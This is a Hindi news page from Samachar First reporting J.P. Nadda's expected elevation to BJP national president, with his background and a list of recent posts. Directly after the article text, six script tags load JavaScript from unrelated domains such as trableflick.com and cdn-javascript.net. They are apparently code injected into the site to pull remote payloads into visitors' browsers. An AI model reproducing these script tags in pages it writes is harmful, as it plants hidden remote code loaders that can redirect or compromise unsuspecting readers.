जगत प्रकाश नड्डा बनेंगे भाजपा के राष्ट्रीय अध्यक्ष

<p>हिमाचल प्रदेश को पहली बार इतना बड़ा सम्मान मिलने जा रहा है। बीजेपी के राष्ट्रीय कार्यकारी अध्यक्ष जगत प्रकाश नड्डा की 20 तारीख को संभवत भाजपा के राष्ट्रीय अध्यक्ष के रूप में ताजपोशी होने जा रही है। मिली जानकारी के अनुसार जब तक पूरे देश में आधे से अधिक प्रदेश अध्यक्षों की नियुक्तियां नहीं हो जाती उस समय तक राष्ट्रीय अध्यक्ष की ताजपोशी भी हो पाना मुमकिन नहीं थी और सितारा 18 तारीख तक आधे से अधिक प्रदेश अध्यक्षों की नियुक्तियां भाजपा के भीतर हो जाएंगी। इसलिए माना जा रहा है कि 20 तारीख को भाजपा जगत प्रकाश नड्डा की भी पूर्ण रूप से भाजपा के अध्यक्ष के रूप में घोषणा कर देगी।</p>

<p>बताते चलें कि मूल रूप से हिमाचल प्रदेश के रहने वाले हैं। लेकिन इनका जन्म और पढ़ाई लिखाई पटना में हुई और पटना में ही छात्र संघ के चुनाव के माध्यम से पटना विश्वविद्यालय के सचिव चुने गए जेपी नड्डा की राजनीतिक पारी जेपी आंदोलन से ही शुरू हुई थी। जो कि अब उन्हें देश में भाजपा के सर्वोच्च पद पर लेकर जाने वाली है। 20 तारीख को जगत प्रकाश नड्डा अगले 3 साल के लिए विश्व की सबसे बड़ी पार्टी के अध्यक्ष बनेंगे जो कि हिमाचल प्रदेश जैसे छोटे से राज्य के लिए बहुत ही बड़े गर्व की बात है।</p>

<p>अमित शाह का बतौर भाजपा अध्यक्ष का कार्यकाल पिछले साल जनवरी महीने में संपन्न हो गया था। लेकिन लोकसभा चुनाव को ध्यान में रखते हुए कार्यकाल को 1 साल के लिए बढ़ा दिया गया था और अब उसी के चलते नए अध्यक्ष की नियुक्ति होना तय माना जा रहा है। जगत प्रकाश नड्डा पिछली सरकार में स्वास्थ्य मंत्री रहे थे। लेकिन इस बार जब नई सरकार भाजपा की बनी तो उन्हें मंत्रिमंडल में कोई स्थान नहीं दिया गया। जिससे कि यह स्पष्ट हो गई थी कि उन्हें संगठन में कोई बहुत बड़ी जिम्मेदारी मिलने वाली है और उसी दौरान उन्हें भाजपा का कार्यकारी अध्यक्ष घोषित कर दिया गया था। अब जब पूरे प्रदेश में भाजपा के संगठनात्मक चुनावों का दौर प्रदेश अध्यक्ष के रूप में संपन्न होने वाला है तो यह कहा जा सकता है कि जगत प्रकाश नड्डा की घोषणा अध्यक्ष के रूप में होने जा रही है जिसको लेकर व्यापक तैयारियां भी दिल्ली में शुरू हो चुकी हैं।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_662254967&amp;key=21aca573d498d25317&amp;cv=1578883808&amp;t=1578883808017″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_459914675&amp;key=21aca573d498d25317&amp;cv=126578&amp;t=1578883808023″ type=”text/javascript”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578883808068″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

झूठ व डर के सहारे सत्ता पाना चाह रहे जयराम : मुख्यमंत्री

नादौन: मुख्यमंत्री ठाकुर सुखविंदर सिंह सूक्खू ने नेता प्रतिपक्ष जयराम ठाकुर को फिर आईना दिखाया…

10 hours ago

मतदान केंद्रों में दिव्यांगों के लिए रैंप की होगी सुविधा: डीसी 

धर्मशाला, 01 मई:. जिला निर्वाचन अधिकारी उपायुक्त हेमराज बैरवा ने बुधवार को कांगड़ा विस क्षेत्र…

10 hours ago

यूनिर्वसल कार्टन लागू करने का निर्णय सराहनीय : कांग्रेस

7वें राज्य वित्तायोग के अध्यक्ष नंद लाल तथा मुख्य संसदीय सचिव मोहन लाल ब्राक्टा ने…

10 hours ago

देश ने तय कर लिया है कि आएंगे तो मोदी ही : जयराम ठाकुर

शिमला : नेता प्रतिपक्ष जयराम ठाकुर ने कहा कि भारत के इतिहास में यह पहली…

10 hours ago

फोर्टिस कांगड़ा में मरीज उठा रहे हिमकेयर सेवाओं का निःशुल्क लाभ

फोर्टिस अस्पताल कांगड़ा में हिमकेयर में अब हर सुविधा उपलब्ध है, जिसका लाभ हर वर्ग…

10 hours ago

मंडी संसदीय क्षेत्र को लेकर विक्रमादित्य सिंह ने गिनाई प्राथमिकताएं

मंडी संसदीय सीट से कांग्रेस प्रत्याशी विक्रमादित्य सिंह ने बीजेपी और मंडी भाजपा कंगना रनौत…

10 hours ago